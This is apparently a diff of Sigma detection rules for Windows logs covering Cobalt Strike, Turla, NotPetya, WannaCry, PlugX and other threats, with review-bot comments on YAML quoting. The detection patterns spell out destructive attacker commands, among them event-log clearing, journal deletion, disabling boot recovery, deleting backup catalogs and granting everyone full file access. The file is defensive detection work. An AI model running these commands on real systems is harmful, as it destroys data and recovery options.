https://twitter.com/nas_bench/status/1539679555908141061 - https://twitter.com/j00sean/status/1537750439701225472 
@@ -18,7 +17,7 @@ detection: Channel: Microsoft-Windows-Diagnosis-Scripted/Operational selection: EventID: 101 - PackagePath|contains: \\\\ + PackagePath|contains: \\\\ # Example would be: \\webdav-test.herokuapp.com@ssl\DavWWWRoot\package condition: diagnosis_scripted and selection falsepositives: - Legitimate package hosted on a known and authorized remote location diff --git a/sigma/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml b/sigma/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml index 2f6985d8a..90aac3c83 100644 --- a/sigma/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml +++ b/sigma/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml @@ -1,11 +1,10 @@ title: Suspicious Cobalt Strike DNS Beaconing - DNS Client id: 0d18728b-f5bf-4381-9dcf-915539fff6c2 related: - - id: f356a9c4-effd-4608-bbf8-408afd5cd006 - type: similar + - id: f356a9c4-effd-4608-bbf8-408afd5cd006 + type: similar status: test -description: Detects a program that invoked suspicious DNS queries known from Cobalt - Strike beacons +description: Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons references: - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/ @@ -17,8 +16,7 @@ tags: logsource: product: windows service: dns-client - definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event - Log must be enabled/collected in order to receive the events.' + definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.' detection: dns_client: Channel: Microsoft-Windows-DNS Client Events/Operational diff --git a/sigma/builtin/dns_client/win_dns_client_anonymfiles_com.yml b/sigma/builtin/dns_client/win_dns_client_anonymfiles_com.yml index fa148c64b..abddacb4d 100644 --- a/sigma/builtin/dns_client/win_dns_client_anonymfiles_com.yml 
+++ b/sigma/builtin/dns_client/win_dns_client_anonymfiles_com.yml @@ -1,11 +1,10 @@ title: DNS Query for Anonfiles.com Domain - DNS Client id: 29f171d7-aa47-42c7-9c7b-3c87938164d9 related: - - id: 065cceea-77ec-4030-9052-fc0affea7110 - type: similar + - id: 065cceea-77ec-4030-9052-fc0affea7110 + type: similar status: test -description: Detects DNS queries for anonfiles.com, which is an anonymous file upload - platform often used for malicious purposes +description: Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes references: - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte author: Nasreddine Bencherchali (Nextron Systems) @@ -16,8 +15,7 @@ tags: logsource: product: windows service: dns-client - definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event - Log must be enabled/collected in order to receive the events.' + definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.' detection: dns_client: Channel: Microsoft-Windows-DNS Client Events/Operational diff --git a/sigma/builtin/dns_client/win_dns_client_mega_nz.yml b/sigma/builtin/dns_client/win_dns_client_mega_nz.yml index 402299410..dc63fcf36 100644 --- a/sigma/builtin/dns_client/win_dns_client_mega_nz.yml +++ b/sigma/builtin/dns_client/win_dns_client_mega_nz.yml @@ -1,8 +1,8 @@ title: DNS Query To MEGA Hosting Website - DNS Client id: 66474410-b883-415f-9f8d-75345a0a66a6 related: - - id: 613c03ba-0779-4a53-8a1f-47f914a4ded3 - type: similar + - id: 613c03ba-0779-4a53-8a1f-47f914a4ded3 + type: similar status: test description: Detects DNS queries for subdomains related to MEGA sharing website references: 
@@ -15,8 +15,7 @@ tags: logsource: product: windows service: dns-client - definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event - Log must be enabled/collected in order to receive the events.' + definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.' detection: dns_client: Channel: Microsoft-Windows-DNS Client Events/Operational diff --git a/sigma/builtin/dns_client/win_dns_client_tor_onion.yml b/sigma/builtin/dns_client/win_dns_client_tor_onion.yml index 1c1ebd04f..651ec29be 100644 --- a/sigma/builtin/dns_client/win_dns_client_tor_onion.yml +++ b/sigma/builtin/dns_client/win_dns_client_tor_onion.yml @@ -1,8 +1,8 @@ title: Query Tor Onion Address - DNS Client id: 8384bd26-bde6-4da9-8e5d-4174a7a47ca2 related: - - id: b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544 - type: similar + - id: b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544 + type: similar status: test description: Detects DNS resolution of an .onion address related to Tor routing networks references: @@ -15,8 +15,7 @@ tags: logsource: product: windows service: dns-client - definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event - Log must be enabled/collected in order to receive the events.' + definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.' detection: dns_client: Channel: Microsoft-Windows-DNS Client Events/Operational diff --git a/sigma/builtin/dns_client/win_dns_client_ufile_io.yml b/sigma/builtin/dns_client/win_dns_client_ufile_io.yml index 9db923639..26f404283 100644 --- a/sigma/builtin/dns_client/win_dns_client_ufile_io.yml +++ b/sigma/builtin/dns_client/win_dns_client_ufile_io.yml 
@@ -1,11 +1,10 @@ title: DNS Query To Ufile.io - DNS Client id: 090ffaad-c01a-4879-850c-6d57da98452d related: - - id: 1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b - type: similar + - id: 1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b + type: similar status: experimental -description: Detects DNS queries to "ufile.io", which was seen abused by malware and - threat actors as a method for data exfiltration +description: Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration references: - https://thedfirreport.com/2021/12/13/diavol-ransomware/ author: Nasreddine Bencherchali (Nextron Systems) @@ -17,8 +16,7 @@ tags: logsource: product: windows service: dns-client - definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event - Log must be enabled/collected in order to receive the events.' + definition: 'Requirements: Microsoft-Windows-DNS Client Events/Operational Event Log must be enabled/collected in order to receive the events.' detection: dns_client: Channel: Microsoft-Windows-DNS Client Events/Operational @@ -27,7 +25,6 @@ detection: QueryName|contains: ufile.io condition: dns_client and selection falsepositives: - - DNS queries for "ufile" are not malicious by nature necessarily. Investigate - the source to determine the necessary actions to take + - DNS queries for "ufile" are not malicious by nature necessarily. Investigate the source to determine the necessary actions to take level: low ruletype: Sigma diff --git a/sigma/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml b/sigma/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml index 6e41fe9c4..ffca67d76 100644 --- a/sigma/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml +++ b/sigma/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml 
@@ -16,7 +16,7 @@ detection: dns_server: Channel: DNS Server selection: - EventID: 6004 + EventID: 6004 # The DNS server received a zone transfer request from %1 for a non-existent or non-authoritative zone %2. condition: dns_server and selection falsepositives: - Unlikely diff --git a/sigma/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml b/sigma/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml index aaeb09e1c..98dab8c3f 100644 --- a/sigma/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml +++ b/sigma/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml @@ -1,13 +1,12 @@ title: DNS Server Error Failed Loading the ServerLevelPluginDLL id: cbe51394-cd93-4473-b555-edf0144952d9 related: - - id: e61e8a88-59a9-451c-874e-70fcc9740d67 - type: derived - - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 - type: derived + - id: e61e8a88-59a9-451c-874e-70fcc9740d67 + type: derived + - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 + type: derived status: test -description: Detects a DNS server error in which a specified plugin DLL (in registry) - could not be loaded +description: Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded references: - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 - https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx diff --git a/sigma/builtin/driverframeworks/win_usb_device_plugged.yml b/sigma/builtin/driverframeworks/win_usb_device_plugged.yml index 1577c5f6a..2bdcf202b 100644 --- a/sigma/builtin/driverframeworks/win_usb_device_plugged.yml +++ b/sigma/builtin/driverframeworks/win_usb_device_plugged.yml 
@@ -14,16 +14,15 @@ tags: logsource: product: windows service: driver-framework - definition: Requires enabling and collection of the Microsoft-Windows-DriverFrameworks-UserMode/Operational - eventlog + definition: Requires enabling and collection of the Microsoft-Windows-DriverFrameworks-UserMode/Operational eventlog detection: driver_framework: Channel: Microsoft-Windows-DriverFrameworks-UserMode/Operational selection: EventID: - - 2003 - - 2100 - - 2102 + - 2003 # Loading drivers + - 2100 # Pnp or power management + - 2102 # Pnp or power management condition: driver_framework and selection falsepositives: - Legitimate administrative activity diff --git a/sigma/builtin/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml b/sigma/builtin/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml index a65e4c5f3..7f11bd5e4 100644 --- a/sigma/builtin/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml +++ b/sigma/builtin/emerging-threats/2014/TA/Axiom/proc_creation_win_apt_zxshell.yml @@ -24,10 +24,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - zxFunction - RemoteDiskXXXXX - NewProcessName|endswith: \rundll32.exe + NewProcessName|endswith: \rundll32.exe condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml b/sigma/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml index 47a704f4c..a5372e7bc 100644 --- a/sigma/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml +++ b/sigma/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_commands_critical.yml @@ -25,7 +25,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine: + CommandLine: - net use \\\\%DomainController%\C$ "P@ssw0rd" * - dir c:\\*.doc* /s - dir %TEMP%\\*.exe 
diff --git a/sigma/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml b/sigma/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml index 8718e0ce5..2bf684be1 100644 --- a/sigma/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml +++ b/sigma/builtin/emerging-threats/2014/TA/Turla/proc_creation_win_apt_turla_comrat_may20.yml @@ -22,12 +22,12 @@ detection: EventID: 4688 Channel: Security selection_cli_1: - CommandLine|contains: + CommandLine|contains: - tracert -h 10 yahoo.com - .WSqmCons))|iex; - Fr`omBa`se6`4Str`ing selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - net use https://docs.live.net - '@aol.co.uk' condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml b/sigma/builtin/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml index ba09ee368..fe8565135 100644 --- a/sigma/builtin/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml +++ b/sigma/builtin/emerging-threats/2015/Exploits/CVE-2015-1641/proc_creation_win_exploit_cve_2015_1641.yml @@ -1,8 +1,7 @@ title: Exploit for CVE-2015-1641 id: 7993792c-5ce2-4475-a3db-a3a5539827ef status: stable -description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used - in exploits for CVE-2015-1641 +description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641 references: - https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/ - https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100 
@@ -23,7 +22,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \WINWORD.EXE - NewProcessName|endswith: \MicroScMgmt.exe + NewProcessName|endswith: \MicroScMgmt.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml b/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml index 35a7d8b21..e13c6ca95 100644 --- a/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml +++ b/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-0261/proc_creation_win_exploit_cve_2017_0261.yml @@ -1,8 +1,7 @@ title: Exploit for CVE-2017-0261 id: 864403a1-36c9-40a2-a982-4c9a45f7d833 status: test -description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits - for CVE-2017-0261 and CVE-2017-0262 +description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262 references: - https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html author: Florian Roth (Nextron Systems) @@ -25,10 +24,9 @@ detection: Channel: Security selection: ParentProcessName|endswith: \WINWORD.EXE - NewProcessName|contains: \FLTLDR.exe + NewProcessName|contains: \FLTLDR.exe condition: process_creation and selection falsepositives: - - Several false positives identified, check for suspicious file names or locations - (e.g. Temp folders) + - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders) level: medium ruletype: Sigma diff --git a/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml b/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml index 3e83ba335..1ed94956f 100644 
--- a/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml +++ b/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-11882/proc_creation_win_exploit_cve_2017_11882.yml @@ -1,8 +1,7 @@ title: Droppers Exploiting CVE-2017-11882 id: 678eb5f4-8597-4be6-8be7-905e4234b53a status: stable -description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other - sub processes like mshta.exe +description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe references: - https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100 - https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw diff --git a/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml b/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml index 9840706c0..6f92a3317 100644 --- a/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml +++ b/sigma/builtin/emerging-threats/2017/Exploits/CVE-2017-8759/proc_creation_win_exploit_cve_2017_8759.yml @@ -1,8 +1,7 @@ title: Exploit for CVE-2017-8759 id: fdd84c68-a1f6-47c9-9477-920584f94905 status: test -description: Detects Winword starting uncommon sub process csc.exe as used in exploits - for CVE-2017-8759 +description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759 references: - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100 - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100 
@@ -26,7 +25,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \WINWORD.EXE - NewProcessName|endswith: \csc.exe + NewProcessName|endswith: \csc.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml b/sigma/builtin/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml index ac7b9cd75..a6014b1e8 100644 --- a/sigma/builtin/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml +++ b/sigma/builtin/emerging-threats/2017/Malware/Adwind-RAT/proc_creation_win_malware_adwind.yml @@ -21,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|contains|all: - - \AppData\Roaming\Oracle - - \java - - '.exe ' - - CommandLine|contains|all: - - cscript.exe - - Retrive - - '.vbs ' + - CommandLine|contains|all: + - \AppData\Roaming\Oracle + - \java + - '.exe ' + - CommandLine|contains|all: + - cscript.exe + - Retrive + - '.vbs ' condition: process_creation and selection level: high ruletype: Sigma diff --git a/sigma/builtin/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml b/sigma/builtin/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml index bb9a15cb5..b358483bc 100644 --- a/sigma/builtin/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml +++ b/sigma/builtin/emerging-threats/2017/Malware/Fireball/proc_creation_win_malware_fireball.yml @@ -21,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32.exe - InstallArcherSvc condition: process_creation and selection diff --git a/sigma/builtin/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml b/sigma/builtin/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml index 136b6d384..2298b7966 100644 
--- a/sigma/builtin/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml +++ b/sigma/builtin/emerging-threats/2017/Malware/NotPetya/proc_creation_win_malware_notpetya.yml @@ -1,9 +1,7 @@ title: NotPetya Ransomware Activity id: 79aeeb41-8156-4fac-a0cd-076495ab82a1 status: test -description: Detects NotPetya ransomware activity in which the extracted passwords - are passed back to the main module via named pipe, the file system journal of - drive C is deleted and Windows eventlogs are cleared using wevtutil +description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil references: - https://securelist.com/schroedingers-petya/78870/ - https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100 @@ -26,15 +24,15 @@ detection: EventID: 4688 Channel: Security selection_specific_pattern: - CommandLine|contains: + CommandLine|contains: - 'wevtutil cl Application & fsutil usn deletejournal /D C:' - dllhost.dat %WINDIR%\ransoms selection_rundll32: - CommandLine|endswith: + CommandLine|endswith: - .dat,#1 - - '.dat #1' + - '.dat #1' # Sysmon removes comma - .zip.dll",#1 - NewProcessName|endswith: \rundll32.exe + NewProcessName|endswith: \rundll32.exe selection_perfc_keyword: - \perfc.dat condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml b/sigma/builtin/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml index fb45a5d4d..72958fbd3 100644 --- a/sigma/builtin/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml +++ b/sigma/builtin/emerging-threats/2017/Malware/PlugX/proc_creation_win_malware_plugx_susp_exe_locations.yml 
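Review bot: The comment added to `- '.dat #1' # Sysmon removes comma` in selection_rundll32 refers to Sysmon, but this file's logsource is the Security channel with EventID 4688, so the comment does not explain why the comma-less variant is kept in this builtin rule. It reads as if copied verbatim from the upstream process_creation rule, where the same selection serves both Sysmon EID 1 and 4688 telemetry; I cannot tell from the hunk whether the converter preserves comments unchanged. A wording that holds for this variant would be `- '.dat #1' # comma-less form of the argument as logged by Sysmon; kept for parity with the sysmon rule`. The `.zip.dll",#1` entry and the rundll32 image match keep the original behaviour, so only the comment needs attention.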
@@ -1,8 +1,7 @@ title: Potential PlugX Activity id: aeab5ec5-be14-471a-80e8-e344418305c2 status: test -description: Detects the execution of an executable that is typically used by PlugX - for DLL side loading starting from an uncommon location +description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location references: - http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/ - https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/ 
@@ -22,84 +21,77 @@ detection: EventID: 4688 Channel: Security selection_cammute: - NewProcessName|endswith: \CamMute.exe + NewProcessName|endswith: \CamMute.exe filter_cammute: - NewProcessName|contains: + NewProcessName|contains: - \Lenovo\Communication Utility\ - \Lenovo\Communications Utility\ selection_chrome_frame: - NewProcessName|endswith: \chrome_frame_helper.exe + NewProcessName|endswith: \chrome_frame_helper.exe filter_chrome_frame: - NewProcessName|contains: \Google\Chrome\application\ + NewProcessName|contains: \Google\Chrome\application\ selection_devemu: - NewProcessName|endswith: \dvcemumanager.exe + NewProcessName|endswith: \dvcemumanager.exe filter_devemu: - NewProcessName|contains: \Microsoft Device Emulator\ + NewProcessName|contains: \Microsoft Device Emulator\ selection_gadget: - NewProcessName|endswith: \Gadget.exe + NewProcessName|endswith: \Gadget.exe filter_gadget: - NewProcessName|contains: \Windows Media Player\ + NewProcessName|contains: \Windows Media Player\ selection_hcc: - NewProcessName|endswith: \hcc.exe + NewProcessName|endswith: \hcc.exe filter_hcc: - NewProcessName|contains: \HTML Help Workshop\ + NewProcessName|contains: \HTML Help Workshop\ selection_hkcmd: - NewProcessName|endswith: \hkcmd.exe + NewProcessName|endswith: \hkcmd.exe filter_hkcmd: - NewProcessName|contains: + NewProcessName|contains: - \System32\ - \SysNative\ - \SysWow64\ selection_mc: - NewProcessName|endswith: \Mc.exe + NewProcessName|endswith: \Mc.exe filter_mc: - NewProcessName|contains: + NewProcessName|contains: - \Microsoft Visual Studio - \Microsoft SDK - \Windows Kit selection_msmpeng: - NewProcessName|endswith: \MsMpEng.exe + NewProcessName|endswith: \MsMpEng.exe filter_msmpeng: - NewProcessName|contains: + NewProcessName|contains: - \Microsoft Security Client\ - \Windows Defender\ - \AntiMalware\ selection_msseces: - NewProcessName|endswith: \msseces.exe + NewProcessName|endswith: \msseces.exe filter_msseces: - NewProcessName|contains: + 
NewProcessName|contains: - \Microsoft Security Center\ - \Microsoft Security Client\ - \Microsoft Security Essentials\ selection_oinfo: - NewProcessName|endswith: \OInfoP11.exe + NewProcessName|endswith: \OInfoP11.exe filter_oinfo: - NewProcessName|contains: \Common Files\Microsoft Shared\ + NewProcessName|contains: \Common Files\Microsoft Shared\ selection_oleview: - NewProcessName|endswith: \OleView.exe + NewProcessName|endswith: \OleView.exe filter_oleview: - NewProcessName|contains: + NewProcessName|contains: - \Microsoft Visual Studio - \Microsoft SDK - \Windows Kit - \Windows Resource Kit\ selection_rc: - NewProcessName|endswith: \rc.exe + NewProcessName|endswith: \rc.exe filter_rc: - NewProcessName|contains: + NewProcessName|contains: - \Microsoft Visual Studio - \Microsoft SDK - \Windows Kit - \Windows Resource Kit\ - \Microsoft.NET\ - condition: process_creation and (( selection_cammute and not filter_cammute ) - or ( selection_chrome_frame and not filter_chrome_frame ) or ( selection_devemu - and not filter_devemu ) or ( selection_gadget and not filter_gadget ) or ( - selection_hcc and not filter_hcc ) or ( selection_hkcmd and not filter_hkcmd - ) or ( selection_mc and not filter_mc ) or ( selection_msmpeng and not filter_msmpeng - ) or ( selection_msseces and not filter_msseces ) or ( selection_oinfo and - not filter_oinfo ) or ( selection_oleview and not filter_oleview ) or ( selection_rc - and not filter_rc )) + condition: process_creation and (( selection_cammute and not filter_cammute ) or ( selection_chrome_frame and not filter_chrome_frame ) or ( selection_devemu and not filter_devemu ) or ( selection_gadget and not filter_gadget ) or ( selection_hcc and not filter_hcc ) or ( selection_hkcmd and not filter_hkcmd ) or ( selection_mc and not filter_mc ) or ( selection_msmpeng and not filter_msmpeng ) or ( selection_msseces and not filter_msseces ) or ( selection_oinfo and not filter_oinfo ) or ( selection_oleview and not filter_oleview ) or ( 
selection_rc and not filter_rc )) fields: - CommandLine - ParentCommandLine diff --git a/sigma/builtin/emerging-threats/2017/Malware/StoneDrill/win_system_apt_stonedrill.yml b/sigma/builtin/emerging-threats/2017/Malware/StoneDrill/win_system_apt_stonedrill.yml index 8bc2b3f29..500915c03 100644 --- a/sigma/builtin/emerging-threats/2017/Malware/StoneDrill/win_system_apt_stonedrill.yml +++ b/sigma/builtin/emerging-threats/2017/Malware/StoneDrill/win_system_apt_stonedrill.yml @@ -1,8 +1,7 @@ title: StoneDrill Service Install id: 9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6 status: test -description: This method detects a service install of the malicious Microsoft Network - Realtime Inspection Service service described in StoneDrill report by Kaspersky +description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky references: - https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/ author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml b/sigma/builtin/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml index 9207ea66e..00656f3da 100644 --- a/sigma/builtin/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml +++ b/sigma/builtin/emerging-threats/2017/Malware/WannaCry/proc_creation_win_malware_wannacry.yml @@ -4,8 +4,7 @@ status: test description: Detects WannaCry ransomware activity references: - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100 -author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, - Jonhnathan Ribeiro +author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro date: 2019/01/16 modified: 2023/02/03 tags: 
@@ -27,37 +26,38 @@ detection:
EventID: 4688
Channel: Security
selection1:
- - NewProcessName|endswith:
- - \tasksche.exe
- - \mssecsvc.exe
- - \taskdl.exe
- - \taskhsvc.exe
- - \taskse.exe
- - \111.exe
- - \lhdfrgui.exe
- - \linuxnew.exe
- - \wannacry.exe
- - NewProcessName|contains: WanaDecryptor
+ - NewProcessName|endswith:
+ - \tasksche.exe
+ - \mssecsvc.exe
+ - \taskdl.exe
+ - \taskhsvc.exe
+ - \taskse.exe
+ - \111.exe
+ - \lhdfrgui.exe
+ # - '\diskpart.exe' # cannot be used in a rule of level critical
+ - \linuxnew.exe
+ - \wannacry.exe
+ - NewProcessName|contains: WanaDecryptor
selection2:
- - CommandLine|contains|all:
- - icacls
- - /grant
- - Everyone:F
- - /T
- - /C
- - /Q
- - CommandLine|contains|all:
- - bcdedit
- - /set
- - '{default}'
- - recoveryenabled
- - 'no'
- - CommandLine|contains|all:
- - wbadmin
- - delete
- - catalog
- - -quiet
- - CommandLine|contains: '@Please_Read_Me@.txt'
+ - CommandLine|contains|all:
+ - icacls
+ - /grant
+ - Everyone:F
+ - /T
+ - /C
+ - /Q
+ - CommandLine|contains|all:
+ - bcdedit
+ - /set
+ - '{default}'
+ - recoveryenabled
+ - no
+ - CommandLine|contains|all:
+ - wbadmin
+ - delete
+ - catalog
+ - -quiet
+ - CommandLine|contains: '@Please_Read_Me@.txt'
condition: process_creation and (1 of selection*)
fields:
- CommandLine
diff --git a/sigma/builtin/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml b/sigma/builtin/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml
index 5ddb99ed3..c0ca40cf5 100644
--- a/sigma/builtin/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml
+++ b/sigma/builtin/emerging-threats/2017/TA/APT10/proc_creation_win_apt_apt10_cloud_hopper.yml
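Review bot: Dropping the quotes around `no` in `selection2` (`- 'no'` became `- no`) changes the YAML value rather than just the indentation: under YAML 1.1 resolution a bare `no` is the boolean false, not the string "no", so the `CommandLine|contains|all` list for the `bcdedit ... recoveryenabled no` pattern would either carry a boolean item or fail to load, depending on the loader. The neighbouring `'{default}'` in the same list kept its quotes, which suggests the change was accidental rather than intentional. Keep the quoted form, `- 'no'`, so the rule keeps matching the literal substring. Whether the loader used by this repository applies YAML 1.1 boolean resolution is not visible here and should be confirmed before relying on the unquoted form.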
@@ -1,8 +1,7 @@
title: Potential APT10 Cloud Hopper Activity
id: 966e4016-627f-44f7-8341-f394905c361f
status: test
-description: Detects potential process and execution activity related to APT10 Cloud
- Hopper operation
+description: Detects potential process and execution activity related to APT10 Cloud Hopper operation
references:
- https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
author: Florian Roth (Nextron Systems)
@@ -21,10 +20,10 @@ detection:
EventID: 4688
Channel: Security
selection_cscript:
- CommandLine|contains: '.vbs /shell '
- NewProcessName|endswith: \cscript.exe
+ CommandLine|contains: '.vbs /shell '
+ NewProcessName|endswith: \cscript.exe
selection_csvde:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- csvde -f C:\windows\web\
- .log
condition: process_creation and (1 of selection_*)
